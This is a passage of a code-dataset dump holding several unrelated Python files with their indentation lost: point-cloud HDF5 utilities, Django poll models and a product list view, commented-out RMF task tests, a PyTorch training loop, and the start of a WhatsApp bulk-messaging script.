global_block_num = sum_sg_bidxmap_sample_num[0,4]
subblock_num = sum_sg_bidxmap_sample_num[:,-1]
mean_sg_bidxmap_sample_num = np.copy(sum_sg_bidxmap_sample_num)
for i in range(sum_sg_bidxmap_sample_num.shape[0]):
mean_sg_bidxmap_sample_num[i,0:5] /= mean_sg_bidxmap_sample_num[i,4]
mean_sg_bidxmap_sample_num[i,5:8] /= mean_sg_bidxmap_sample_num[i,7]
return mean_sg_bidxmap_sample_num,global_block_num,subblock_num
def get_mean_flatten_sample_rate(sum_flatten_bmap_sample_num):
global_block_num = sum_flatten_bmap_sample_num[0,2]
mean_flatten_bmap_sample_num = np.copy(sum_flatten_bmap_sample_num)
for i in range(sum_flatten_bmap_sample_num.shape[0]):
mean_flatten_bmap_sample_num[i,0:3] /= mean_flatten_bmap_sample_num[i,2]
return mean_flatten_bmap_sample_num,global_block_num
def get_attrs_str(attrs):
attrs_str = ''
for a in attrs:
elenames = ''
if type(attrs[a])==str:
a_str = attrs[a]
else:
a_val = attrs[a]
if a == "sum_sg_bidxmap_sample_num":
a_val,global_block_num,subblock_num = get_mean_sg_sample_rate(a_val)
elenames = str(GlobalSubBaseBLOCK.get_sg_bidxmap_sample_num_elename()) + '\n' + 'global_block_num: %d'%(global_block_num) + '\tsubblock_num: %s'%(subblock_num) + '\n'
if a == "sum_flatten_bmap_sample_num":
a_val,global_block_num = get_mean_flatten_sample_rate(a_val)
elenames = str(GlobalSubBaseBLOCK.get_flatten_bidxmaps_sample_num_elename()) +'\n' + 'global_block_num: %d'%(global_block_num) + '\n'
a_str = np.array2string(a_val,precision=2,separator=',',suppress_small=True)
attrs_str += ( a+':\n'+elenames+a_str+'\n' )
return attrs_str
def show_h5f_summary_info(h5f):
root_attrs = [attr for attr in h5f.attrs]
summary_str = ''
summary_str += '--------------------------------------------------------------------------\n'
summary_str += 'The root_attr: %s'%(root_attrs) + '\n'
summary_str += get_attrs_str(h5f.attrs) + '\n'
summary_str += '\n--------------------------------------------------------------------------\n'
summary_str += 'The elements in h5f\n'
def show_dset(dset_name,id):
dset_str = ''
if id>10: return dset_str
dset = h5f[dset_name]
dset_str += '# dataset %d: %s shape=%s\n'%(id,dset_name,dset.shape)
if id>6: return dset_str
dset_str += get_attrs_str(dset.attrs) + '\n'
if len(dset.shape)==2:
dset_str += str( dset[0:min(10,dset.shape[0]),:]) + '\n'
if len(dset.shape)==3:
dset_str += str( dset[0:min(2,dset.shape[0]),:] ) + '\n'
elif len(dset.shape)==4:
var = dset[0:min(1,dset.shape[0]),0,0:min(2,dset.shape[2]),:]
dset_str += np.array2string(var,formatter={'float_kind':lambda var:"%0.2f"%var}) + '\n'
dset_str += '\n'
return dset_str
def show_root_ele(ele_name,id):
root_ele_str = ''
ele = h5f[ele_name]
if type(ele) == h5py._hl.group.Group:
root_ele_str += 'The group: %s'%(ele_name) + '\n'
root_ele_str += get_attrs_str(ele.attrs) + '\n'
for dset_name in ele:
root_ele_str += show_dset(ele_name+'/'+dset_name,id)
else:
root_ele_str += show_dset(ele_name,id)
return root_ele_str
k = -1
for k, ele_name in enumerate(h5f):
if ele_name == 'xyz':
summary_str += show_dset(ele_name,k)
continue
summary_str += show_root_ele(ele_name,k)
summary_str += '%d datasets totally'%(k+1)+'\n'
print( summary_str )
return summary_str
def get_sample_choice(org_N,sample_N,random_sampl_pro=None):
'''
all replace with random_choice laer
'''
sample_method='random'
if sample_method == 'random':
if org_N == sample_N:
sample_choice = np.arange(sample_N)
elif org_N > sample_N:
sample_choice = np.random.choice(org_N,sample_N,replace=False,p=random_sampl_pro)
else:
#sample_choice = np.arange(org_N)
new_samp = np.random.choice(org_N,sample_N-org_N)
sample_choice = np.concatenate( (np.arange(org_N),new_samp) )
reduced_num = org_N - sample_N
#str = '%d -> %d %d%%'%(org_N,sample_N,100.0*sample_N/org_N)
#print(str)
return sample_choice,reduced_num
def random_choice(org_vector,sample_N,random_sampl_pro=None, keeporder=True, only_tile_last_one=False):
assert org_vector.ndim == 1
org_N = org_vector.size
if org_N == sample_N:
sampled_vector = org_vector
elif org_N > sample_N:
sampled_vector = np.random.choice(org_vector,sample_N,replace=False,p=random_sampl_pro)
if keeporder:
sampled_vector = np.sort(sampled_vector)
else:
if only_tile_last_one:
new_vector = np.array( [ org_vector[-1] ]*(sample_N-org_N) ).astype(org_vector.dtype)
else:
new_vector = np.random.choice(org_vector,sample_N-org_N,replace=True)
sampled_vector = np.concatenate( [org_vector,new_vector] )
#str = '%d -> %d %d%%'%(org_N,sample_N,100.0*sample_N/org_N)
#print(str)
return sampled_vector
def index_in_sorted(sorted_vector,values):
if values.ndim==0:
values = np.array([values])
assert values.ndim<=1 and sorted_vector.ndim==1
#values_valid = values[np.isin(values,sorted_vector)]
indexs = np.searchsorted(sorted_vector,values)
indexs_valid = []
for j,index in enumerate(indexs):
if index<sorted_vector.size and sorted_vector[index] == values[j]:
indexs_valid.append( index )
indexs_valid = np.array(indexs_valid)
assert indexs_valid.size <= values.size
#assert indexs.size==0 or np.max(indexs) < sorted_vector.size, 'err in index_in_sorted'
return indexs_valid
def check_h5fs_intact(file_name):
if not os.path.exists(file_name):
return False,"file not exist: %s"%(file_name)
f_format = os.path.splitext(file_name)[-1]
if f_format == '.rh5':
return Raw_H5f.check_rh5_intact(file_name)
elif f_format == '.sh5' or f_format == '.rsh5':
return Sorted_H5f.check_sh5_intact(file_name)
elif f_format == '.sph5' or f_format == '.prh5':
return Normed_H5f.check_sph5_intact(file_name)
elif f_format == '.bmh5':
return GlobalSubBaseBLOCK.check_bmh5_intact(file_name)
else:
return False, "file format not recognized %s"%(f_format)
def float_exact_division( A, B ):
C = A / B
r = np.isclose( C, np.rint(C) )
R = r.all()
return R
def my_fix(orgvar):
# why do not use np.fix() directly: np.fix(2.999999) = 2.0
assert orgvar.ndim == 1
rint_var = np.rint(orgvar)
zero_gap = rint_var - orgvar
fix_var = np.copy(orgvar).astype(np.int64)
for i in range(orgvar.size):
if np.isclose(zero_gap[i],0):
fix_var[i] = rint_var[i].astype(np.int64)
else:
fix_var[i] = np.fix(orgvar[i]).astype(np.int64)
return fix_var
def my_ceil(orgvar):
# why do not use np.ceil: np.ceil(12.0000000000000001)=13
assert orgvar.ndim == 1
rint_var = np.rint(orgvar)
zero_gap = rint_var - orgvar
ceil_var = np.copy(orgvar).astype(np.int64)
for i in range(orgvar.size):
if np.isclose(zero_gap[i],0):
ceil_var[i] = rint_var[i].astype(np.int64)
else:
try:
ceil_var[i] = np.ceil(orgvar[i]).astype(np.int64)
except:
import pdb; pdb.set_trace() # XXX BREAKPOINT
pass
return ceil_var
class Raw_H5f():
'''
* raw data:unsorted points,all the time in one dataset
* Each data type as a hdf5 dataset: xyz, intensity, label, color
* class "Sorted_H5f" will sort data to blocks based on this class
'''
file_flag = 'RAW_H5F'
h5_num_row_1M = 50*1000
dtypes = { 'xyz':np.float32, 'nxnynz':np.float32, 'intensity':np.int32, \
'color':np.uint8,'label_category':np.uint32,'label_instance':np.int32,\
'label_material':np.int32, 'label_mesh':np.int32, 'label_raw_category':np.int32 }
num_channels = {'xyz':3,'nxnynz':3,'intensity':1,'color':3,'label_category':1,\
'label_instance':1,'label_material':1,'label_mesh':1, 'label_raw_category':1}
def __init__(self,raw_h5_f,file_name,datasource_name=None):
self.h5f = raw_h5_f
if datasource_name == None:
assert 'datasource_name' in self.h5f.attrs
else:
self.h5f.attrs['datasource_name'] = datasource_name
assert self.h5f.attrs['datasource_name'] in DATA_SOURCE_NAME_LIST
self.datasource_name = self.h5f.attrs['datasource_name']
self.dataset_meta = DatasetsMeta(self.datasource_name)
self.get_summary_info()
self.file_name = file_name
self.num_default_row = 0
def show_h5f_summary_info(self):
print('\n\nsummary of file: ',self.file_name)
return show_h5f_summary_info(self.h5f)
def set_num_default_row(self,N):
self.num_default_row = N
def get_dataset(self,data_name):
if data_name in self.h5f:
return self.h5f[data_name]
assert(data_name in self.dtypes)
nc = self.num_channels[data_name]
dset = self.h5f.create_dataset(data_name,shape=(self.num_default_row,nc),\
maxshape=(None,nc),dtype=self.dtypes[data_name],\
chunks = (self.h5_num_row_1M,nc),\
compression = "gzip")
dset.attrs['valid_num'] = 0
setattr(self,data_name+'_dset',dset)
if 'element_names' not in self.h5f.attrs:
self.h5f.attrs['element_names'] = [data_name]
else:
self.h5f.attrs['element_names'] = [data_name]+[e for e in self.h5f.attrs['element_names']]
return dset
def get_total_num_channels_name_list(self):
total_num_channels = 0
data_name_list = [str(dn) for dn in self.h5f]
for dn in data_name_list:
total_num_channels += self.num_channels[dn]
return total_num_channels,data_name_list
def append_to_dset(self,dset_name,new_data):
self.add_to_dset(dset_name,new_data,None,None)
def get_all_dsets(self,start_idx,end_idx):
out_dset_order = ['xyz','color','label','intensity']
data_list = []
for dset_name in out_dset_order:
if dset_name in self.h5f:
data_k = self.h5f[dset_name][start_idx:end_idx,:]
data_list.append(data_k)
data = np.concatenate(data_list,1)
return data
def add_to_dset(self,dset_name,new_data,start,end):
dset = self.get_dataset(dset_name)
assert dset.ndim == new_data.ndim
valid_n = dset.attrs['valid_num']
if start == None:
start = valid_n
end = start + new_data.shape[0]
if dset.shape[0] < end:
dset.resize((end,)+dset.shape[1:])
if valid_n < end:
dset.attrs['valid_num'] = end
if new_data.ndim==1 and dset.ndim==2 and dset.shape[1]==1:
new_data = np.expand_dims(new_data,1)
dset[start:end,:] = new_data
def rm_invalid(self):
for dset_name in self.h5f:
dset = self.h5f[dset_name]
if 'valid_num' in dset.attrs:
valid_num = dset.attrs['valid_num']
if valid_num < dset.shape[0]:
dset.resize( (valid_num,)+dset.shape[1:] )
def get_summary_info(self):
for dset_name in self.h5f:
setattr(self,dset_name+'_dset',self.h5f[dset_name])
if 'xyz' in self.h5f:
self.total_row_N = self.xyz_dset.shape[0]
self.xyz_max = self.xyz_dset.attrs['max']
self.xyz_min = self.xyz_dset.attrs['min']
self.xyz_scope = self.xyz_max - self.xyz_min
def generate_objfile(self,obj_file_name=None,IsLabelColor=False,xyz_cut_rate=None):
if obj_file_name==None:
base_fn = os.path.basename(self.file_name)
base_fn = os.path.splitext(base_fn)[0]
folder_path = os.path.dirname(self.file_name)
obj_folder = os.path.join(folder_path,'obj/'+base_fn)
print('obj_folder:',obj_folder)
obj_file_name_nocolor = os.path.join(obj_folder,base_fn+'_xyz.obj')
if IsLabelColor:
base_fn = base_fn + '_TrueLabel'
obj_file_name = os.path.join(obj_folder,base_fn+'.obj')
if not os.path.exists(obj_folder):
os.makedirs(obj_folder)
print('automatic obj file name: %s'%(obj_file_name))
with open(obj_file_name,'w') as out_obj_file:
with open(obj_file_name_nocolor,'w') as xyz_obj_file:
xyz_dset = self.xyz_dset
if 'color' in self.h5f:
color_dset = self.color_dset
else:
if 'label_category' in self.h5f:
IsLabelColor = True
if IsLabelColor:
label_category_dset = self.label_category_dset
if xyz_cut_rate != None:
# when rate < 0.5: cut small
# when rate >0.5: cut big
xyz_max = np.array([ np.max(xyz_dset[:,i]) for i in range(3) ])
xyz_min = np.array([ np.min(xyz_dset[:,i]) for i in range(3) ])
xyz_scope = xyz_max - xyz_min
xyz_thres = xyz_scope * xyz_cut_rate + xyz_min
print('xyz_thres = ',str(xyz_thres))
cut_num = 0
row_step = self.h5_num_row_1M * 10
row_N = xyz_dset.shape[0]
for k in range(0,row_N,row_step):
end = min(k+row_step,row_N)
xyz_buf_k = xyz_dset[k:end,:]
if 'color' in self.h5f:
color_buf_k = color_dset[k:end,:]
buf_k = np.hstack((xyz_buf_k,color_buf_k))
else:
buf_k = xyz_buf_k
if IsLabelColor:
label_k = label_category_dset[k:end,0]
for j in range(0,buf_k.shape[0]):
is_cut_this_point = False
if xyz_cut_rate!=None:
# cut by position
for xyz_j in range(3):
if (xyz_cut_rate[xyz_j] >0.5 and buf_k[j,xyz_j] > xyz_thres[xyz_j]) or \
(xyz_cut_rate[xyz_j]<=0.5 and buf_k[j,xyz_j] < xyz_thres[xyz_j]):
is_cut_this_point = True
if is_cut_this_point:
cut_num += 1
continue
if not IsLabelColor:
str_j = 'v ' + '\t'.join( ['%0.5f'%(d) for d in buf_k[j,0:3]]) + ' \t'\
+ '\t'.join( ['%d'%(d) for d in buf_k[j,3:6]]) + '\n'
else:
label = label_k[j]
label_color = self.dataset_meta.label2color[label]
str_j = 'v ' + '\t'.join( ['%0.5f'%(d) for d in buf_k[j,0:3]]) + ' \t'\
+ '\t'.join( ['%d'%(d) for d in label_color ]) + '\n'
nocolor_str_j = 'v ' + '\t'.join( ['%0.5f'%(d) for d in buf_k[j,0:3]]) + ' \n'
out_obj_file.write(str_j)
xyz_obj_file.write(nocolor_str_j)
print('gen raw obj: %s'%(obj_file_name,))
def rh5_create_done(self):
self.rm_invalid()
self.add_geometric_scope()
self.write_raw_summary()
#self.show_h5f_summary_info()
def write_raw_summary(self):
summary_fn = os.path.splitext( self.file_name )[0]+'.txt'
with open(summary_fn,'w') as summary_f:
summary_f.write( self.show_h5f_summary_info() )
def add_geometric_scope(self,line_num_limit=None):
''' calculate the geometric scope of raw h5 data, and add the result to attrs of dset'''
#begin = time.time()
max_xyz = -np.ones((3))*1e10
min_xyz = np.ones((3))*1e10
xyz_dset = self.xyz_dset
row_step = self.h5_num_row_1M
print('File: %s %d lines'\
%(os.path.basename(self.file_name),xyz_dset.shape[0]) )
#print('read row step = %d'%(row_step))
for k in range(0,xyz_dset.shape[0],row_step):
end = min(k+row_step,xyz_dset.shape[0])
xyz_buf = xyz_dset[k:end,:]
xyz_buf_max = xyz_buf.max(axis=0)
xyz_buf_min = xyz_buf.min(axis=0)
max_xyz = np.maximum(max_xyz,xyz_buf_max)
min_xyz = np.minimum(min_xyz,xyz_buf_min)
if line_num_limit!=None and k > line_num_limit:
print('break at k = ',line_num_limit)
break
xyz_dset.attrs['max'] = max_xyz
xyz_dset.attrs['min'] = min_xyz
self.h5f.attrs['xyz_max'] = max_xyz
self.h5f.attrs['xyz_min'] = min_xyz
max_str = ' '.join([ str(e) for e in max_xyz ])
min_str = ' '.join([ str(e) for e in min_xyz ])
print('max_str=%s\tmin_str=%s'%(max_str,min_str) )
#print('T=',time.time()-begin)
@staticmethod
def check_rh5_intact( file_name ):
f_format = os.path.splitext(file_name)[-1]
assert f_format == '.rh5'
if not os.path.exists(file_name):
return False, "%s not exist"%(file_name)
#if os.path.getsize( file_name ) / 1000.0 < 100:
# return False,"file too small < 20 K"
file_type = magic.from_file(file_name)
if "Hierarchical Data Format" not in file_type:
return False,"File signature err"
with h5py.File(file_name,'r') as h5f:
attrs_to_check = ['xyz_max','xyz_min']
for attrs in attrs_to_check:
if attrs not in h5f.attrs:
return False, "%s not in %s"%(attrs,file_name)
return True,""
def Write_all_file_accuracies(normed_h5f_file_list=None,out_path=None,pre_out_fn=''):
if normed_h5f_file_list == None:
normed_h5f_file_list = glob.glob( GLOBAL_PARA.stanford_indoor3d_globalnormedh5_stride_0d5_step_1_4096 +
'/Area_2_office_1*' )
if out_path == None: out_path = os.path.join(GLOBAL_PARA.stanford_indoor3d_globalnormedh5_stride_0d5_step_1_4096,
'pred_accuracy')
if not os.path.exists(out_path):
os.makedirs(out_path)
all_acc_fn = os.path.join(out_path,pre_out_fn+'accuracies.txt')
all_ave_acc_fn = os.path.join(out_path,pre_out_fn+'average_accuracies.txt')
class_TP = class_FN = class_FP = np.zeros(shape=(len(Normed_H5f.g_class2label)))
total_num = 0
average_class_accu_ls = []
with open(all_acc_fn,'w') as all_acc_f,open(all_ave_acc_fn,'w') as all_ave_acc_f:
for i,fn in enumerate(normed_h5f_file_list):
h5f = h5py.File(fn,'r')
norm_h5f = Normed_H5f(h5f,fn)
class_TP_i,class_FN_i,class_FP_i,total_num_i,acc_str_i,ave_acc_str_i = norm_h5f.Get_file_accuracies(
IsWrite=False, out_path = out_path)
class_TP = class_TP_i + class_TP
class_FN = class_FN_i + class_FN
class_FP = class_FP_i + class_FP
total_num = total_num_i + total_num
if acc_str_i != '':
all_acc_f.write('File: '+os.path.basename(fn)+'\n')
all_acc_f.write(acc_str_i+'\n')
all_ave_acc_f.write(ave_acc_str_i+'\t: '+os.path.basename(fn)+'\n')
acc_str,ave_acc_str = Normed_H5f.cal_accuracy(class_TP,class_FN,class_FP,total_num)
ave_str = 'Throughout All %d files.\n'%(i+1) + acc_str
all_acc_f.write('\n'+ave_str)
all_ave_acc_f.write('\n'+ave_str)
print('accuracy file: '+all_acc_fn)
print('average accuracy file: '+all_ave_acc_fn)
return ave_str,out_path,class_TP,class_FN,class_FP,total_num
def Write_Area_accuracies():
ave_str_areas = ''
class_TP = class_FN = class_FP = np.zeros(shape=(len(Normed_H5f.g_class2label)))
total_num = 0
for i in range(6):
glob_i = 'Area_%d'%(i+1)
normed_h5f_file_list = glob.glob( os.path.join(GLOBAL_PARA.stanford_indoor3d_globalnormedh5_stride_0d5_step_1_4096,
glob_i+'*') )
ave_str,out_path,class_TP_i,class_FN_i,class_FP_i,total_num_i = Write_all_file_accuracies(normed_h5f_file_list,pre_out_fn=glob_i+'_')
class_TP = class_TP_i + class_TP
class_FN = class_FN_i + class_FN
class_FP = class_FP_i + class_FP
total_num = total_num_i + total_num
ave_str_areas += '\nArea%d\n'%i
ave_str_areas += ave_str
acc_str,ave_acc_str = Normed_H5f.cal_accuracy(class_TP,class_FN,class_FP,total_num)
all_area_str = '\nThrough %d areas.\n'%(i+1)+acc_str
with open(os.path.join(out_path,'areas_accuracies.txt'),'w' ) as area_acc_f:
area_acc_f.write(ave_str_areas)
area_acc_f.write(all_area_str)
#-------------------------------------------------------------------------------
# Test above codes
#-------------------------------------------------------------------------------
def main(file_list):
outdoor_prep = MAIN_DATA_PREP()
actions = ['merge','sample_merged','obj_sampled_merged','norm_sampled_merged']
actions = ['merge','sample_merged','norm_sampled_merged']
outdoor_prep.main(file_list,actions,sample_num=4096,sample_method='random',\
stride=[8,8,-1],step=[8,8,-1])
#outdoor_prep.Do_sort_to_blocks()
#Do_extract_part_area()
#outdoor_prep.test_sub_block_ks()
#outdoor_prep.DO_add_geometric_scope_file()
#outdoor_prep.DO_gen_rawETH_to_h5()
def show_h5f_file():
fn = '/home/y/Research/dynamic_pointnet/data/Matterport3D_H5F/v1/scans/17DRP5sb8fy/stride_0d1_step_0d1/region2.sh5'
fn = '/home/y/DS/Matterport3D/Matterport3D_H5F/v1/scans/17DRP5sb8fy/stride_0d1_step_0d1_pyramid-1_2-512_128_64_16-0d2_0d4_0d8_16/region2.prh5'
with h5py.File(fn,'r') as h5f:
show_h5f_summary_info(h5f)
if __name__ == '__main__':
START_T = time.time()
Do_extract_part_area()
T = time.time() - START_T
print('exit main, T = ',T)
| StarcoderdataPython |
3331588 | <gh_stars>1-10
from django.db import models
class Question(models.Model):
question_text = models.CharField(max_length=200, unique=True, null=False)
pub_date = models.DateTimeField()
def __str__(self):
return '问题: %s' % self.question_text
class Choice(models.Model):
choice_text = models.CharField(max_length=200, null=False)
votes = models.IntegerField(default=0)
question = models.ForeignKey(Question, on_delete=models.CASCADE)
def __str__(self):
return '%s => %s' % (self.question, self.choice_text)
| StarcoderdataPython |
13791 | # Generated by Django 3.1.5 on 2021-01-25 16:24
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0002_auto_20210124_0610'),
]
operations = [
migrations.RenameModel(
old_name='Parent',
new_name='Account',
),
]
| StarcoderdataPython |
3242023 | from django.shortcuts import render
from django.views.generic import View
from .models import GoodsCategory
from meiduo_mall.utils.category import get_category
#分页
from django.core.paginator import Paginator
# Create your views here.
class ListView(View):
def get(self, request, category_id, page_num):
# 查询当前指定分类对象
try:
category3 = GoodsCategory.objects.get(pk=category_id)
except:
return render(request, '404.html')
categories=get_category()
category2=category3.parent
category1=category2.parent
breadcrumb={
'cat1':{
'name':category1.name,
'url':category1.goodchannel_set.all()[0].url
},
'cat2':category2,
'cat3':category3
}
skus=category3.sku_set.filter(is_launched=True)
sort =request.GET('sort','default')
#价格
if sort =='price':
skus=skus.order_by('price')
#人气
elif sort=='hot':
skus=skus.order_by('-sales')
#默认
else:
skus=skus.order_by('-id')
#一页有几条数据
paginator=Paginator.page(skus,5)
#第几条数据
page_skus=paginator.page(page_num)
context={'categories':categories,
'breadcrumb':breadcrumb,
'sort':sort,
'page_skus':page_skus,
'category':category3
}
return render(request, 'list.html',context)
| StarcoderdataPython |
1643679 | <reponame>baviera08/romi-dashboard
# import asyncio
# import concurrent.futures
# from rmf_task_msgs.msg import TaskSummary as RmfTaskSummary
# from rmf_task_msgs.msg import TaskType as RmfTaskType
# from rmf_task_msgs.srv import CancelTask as RmfCancelTask
# from rmf_task_msgs.srv import SubmitTask as RmfSubmitTask
# from ...models import CancelTask, CleanTaskDescription, SubmitTask, TaskSummary
# from ...models import tortoise_models as ttm
# from ..test_fixtures import RouteFixture
# class TestTasksRoute(RouteFixture):
# def test_submit_task_request(self):
# # create a submit task request message
# task = SubmitTask(
# task_type=RmfTaskType.TYPE_CLEAN,
# start_time=0,
# description=CleanTaskDescription(cleaning_zone="zone_2"),
# priority=0,
# )
# fut = self.host_service_one(
# RmfSubmitTask, "submit_task", RmfSubmitTask.Response(success=True)
# )
# resp = self.session.post(f"{self.base_url}/tasks/submit_task", data=task.json())
# self.assertEqual(resp.status_code, 200)
# ros_received: RmfSubmitTask.Request = fut.result(3)
# self.assertEqual(ros_received.requester, "rmf_server")
# def test_cancel_task_request(self):
# cancel_task = CancelTask(task_id="test_task")
# fut = self.host_service_one(
# RmfCancelTask, "cancel_task", RmfCancelTask.Response(success=True)
# )
# resp = self.session.post(
# f"{self.base_url}/tasks/cancel_task", data=cancel_task.json()
# )
# self.assertEqual(resp.status_code, 200)
# received: RmfCancelTask.Request = fut.result(3)
# self.assertEqual(received.task_id, "test_task")
# def test_cancel_task_failure(self):
# cancel_task = CancelTask(task_id="test_task")
# fut = self.host_service_one(
# RmfCancelTask,
# "cancel_task",
# RmfCancelTask.Response(success=False, message="test error"),
# )
# resp = self.session.post(
# f"{self.base_url}/tasks/cancel_task", data=cancel_task.json()
# )
# self.assertEqual(resp.status_code, 500)
# fut.result(3)
# self.assertEqual(resp.json()["detail"], "test error")
# def test_query_tasks(self):
# dataset = [
# TaskSummary(
# task_id="task_1",
# fleet_name="fleet_1",
# submission_time={"sec": 1000, "nanosec": 0},
# start_time={"sec": 2000, "nanosec": 0},
# end_time={"sec": 3000, "nanosec": 0},
# robot_name="robot_1",
# state=RmfTaskSummary.STATE_COMPLETED,
# task_profile={
# "description": {
# "task_type": {"type": RmfTaskType.TYPE_LOOP},
# "priority": {"value": 0},
# }
# },
# ),
# TaskSummary(
# task_id="task_2",
# fleet_name="fleet_2",
# submission_time={"sec": 4000, "nanosec": 0},
# start_time={"sec": 5000, "nanosec": 0},
# end_time={"sec": 6000, "nanosec": 0},
# robot_name="robot_2",
# state=RmfTaskSummary.STATE_ACTIVE,
# task_profile={
# "description": {
# "task_type": {"type": RmfTaskType.TYPE_DELIVERY},
# "priority": {"value": 1},
# }
# },
# ),
# ]
# fut = concurrent.futures.Future()
# async def save_data():
# fut.set_result(
# await asyncio.gather(
# *(ttm.TaskSummary.save_pydantic(data) for data in dataset)
# )
# )
# self.server.app.wait_ready()
# self.server.app.loop.create_task(save_data())
# fut.result()
# resp = self.session.get(f"{self.base_url}/tasks?task_id=task_1,task_2")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 2)
# resp = self.session.get(f"{self.base_url}/tasks?fleet_name=fleet_1")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# self.assertEqual(items[0]["task_summary"]["fleet_name"], "fleet_1")
# resp = self.session.get(f"{self.base_url}/tasks?robot_name=robot_1")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# self.assertEqual(items[0]["task_summary"]["robot_name"], "robot_1")
# resp = self.session.get(f"{self.base_url}/tasks?state=completed")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# self.assertEqual(
# items[0]["task_summary"]["state"], RmfTaskSummary.STATE_COMPLETED
# )
# resp = self.session.get(f"{self.base_url}/tasks?task_type=loop")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# self.assertEqual(
# items[0]["task_summary"]["task_profile"]["description"]["task_type"][
# "type"
# ],
# RmfTaskType.TYPE_LOOP,
# )
# resp = self.session.get(f"{self.base_url}/tasks?priority=0")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_1")
# resp = self.session.get(f"{self.base_url}/tasks?submission_time_since=4000")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_2")
# resp = self.session.get(f"{self.base_url}/tasks?start_time_since=5000")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_2")
# resp = self.session.get(f"{self.base_url}/tasks?end_time_since=6000")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 1)
# self.assertEqual(items[0]["task_summary"]["task_id"], "task_2")
# # test no match
# resp = self.session.get(
# f"{self.base_url}/tasks?fleet_name=fleet_1&start_time_since=5000"
# )
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 0)
# # no query returns everything
# resp = self.session.get(f"{self.base_url}/tasks")
# self.assertEqual(resp.status_code, 200)
# resp_json = resp.json()
# items = resp_json["items"]
# self.assertEqual(len(items), 2)
# def test_get_task_summary(self):
# dataset = [
# TaskSummary(
# task_id="task_1",
# fleet_name="fleet_1",
# submission_time={"sec": 1000, "nanosec": 0},
# start_time={"sec": 2000, "nanosec": 0},
# end_time={"sec": 3000, "nanosec": 0},
# robot_name="robot_1",
# state=RmfTaskSummary.STATE_COMPLETED,
# task_profile={
# "description": {
# "task_type": {"type": RmfTaskType.TYPE_LOOP},
# "priority": {"value": 0},
# }
# },
# ),
# ]
# fut = concurrent.futures.Future()
# async def save_data():
# fut.set_result(
# await asyncio.gather(
# *(ttm.TaskSummary.save_pydantic(data) for data in dataset)
# )
# )
# self.server.app.wait_ready()
# self.server.app.loop.create_task(save_data())
# fut.result()
# resp = self.session.get(f"{self.base_url}/tasks/task_1/summary")
# self.assertEqual(200, resp.status_code)
# resp_json = resp.json()
# self.assertEqual("task_1", resp_json["task_id"])
| StarcoderdataPython |
3331056 | <filename>train_model.py
import torch
from torch import optim, nn
from preprocess import preprocess_image
from utils import save_model
num_epochs = 10
log_step = 10
eval_step = 5
save_step = 5
# from vgg import model, feature_extracter
# from image_loader import image_loader
# loader = image_loader('/home/iacv/project/sketch/dataset/images/')
# model_train = model(feature_extracter,10)
def train(model_train, loader, gpu_flag,root_folder):
optimizer = optim.Adam( model_train.parameter() )
criterion = nn.CrossEntropyLoss()
for epoch in range( num_epochs ):
for step, ( images, lables ) in enumerate( loader ):
images = preprocess_image( array = images,
split_type = 'train',
use_gpu = gpu_flag )
lables = torch.tensor(lables)
if(gpu_flag == True):
lables = lables.cuda()
optimizer.zero_grad()
preds = model_train( images )
loss = criterion( preds, lables )
loss.backward()
optimizer.step()
# print step info
if ((step + 1) % log_step == 0):
print("Epoch [{}/{}] Step [{}/{}]: loss={}"
.format(epoch + 1,
num_epochs,
step + 1,
loader.size['train'],
loss.data.item()))
# # eval model on validation set
# if ((epoch + 1) % eval_step == 0):
# eval_src(source_encoder, source_classifier, data_loader)
# save model parameters
if ((epoch + 1) % save_step == 0):
save_model( model_train, model_train.name + "-{}.pt".format(epoch + 1),root_folder)
# save final model
save_model(model_train, model_train.name + "-final.pt", root_folder)
return model_train | StarcoderdataPython |
1658895 | """
This code can help you to send automatic messages in Whatsapp.
Provide a csv or xls* file containing phone numbers in a column to send an
equal message to all of them.
Make sure that the area/state code is informed in your
numbers, otherwise the message will not be delivered.
Note: The code takes some time to send the message because of the
pywhatkit external library delay. If you are going to send a lot of
messages, it will be better to 'leave' the code running because it
will take some time.
"""
import warnings
import pandas as pd
import re
import pywhatkit as kit
import os
import pyautogui
from datetime import datetime as dt
from time import sleep
warnings.filterwarnings('ignore')
def warning_print(string):
print('\033[1;31;40m' + string + '\033[0m') # Colors the terminal in red
def get_file():
file = input(r'Please, insert the .xls* or .csv file path that contains the phone numbers: ')
_, file_extension = os.path.splitext(file)
while not (os.path.exists(file)) or (file_extension[0:4] not in ['.csv', '.xls']):
if not os.path.exists(file):
warning_print(f'This file path does not exist in your system: "{file}". Try again.')
else:
warning_print(f'You must select a .csv or .xls* file. Try again.')
file = input(r'Please, insert the .xls* or .csv file path that contains the phone numbers: ')
_, file_extension = os.path.splitext(file)
return file, file_extension
def clean_number(number):
return re.sub(r'\D', '', number) # Removes all extra symbols in the number, like "(", ")", "-", "+"
def format_phone(number, country_code=''):
phone = str(number)
phone = clean_number(phone)
if country_code:
country_code = clean_number(country_code)
len_country_code = len(country_code)
if phone[:len_country_code] != country_code:
phone = country_code + phone
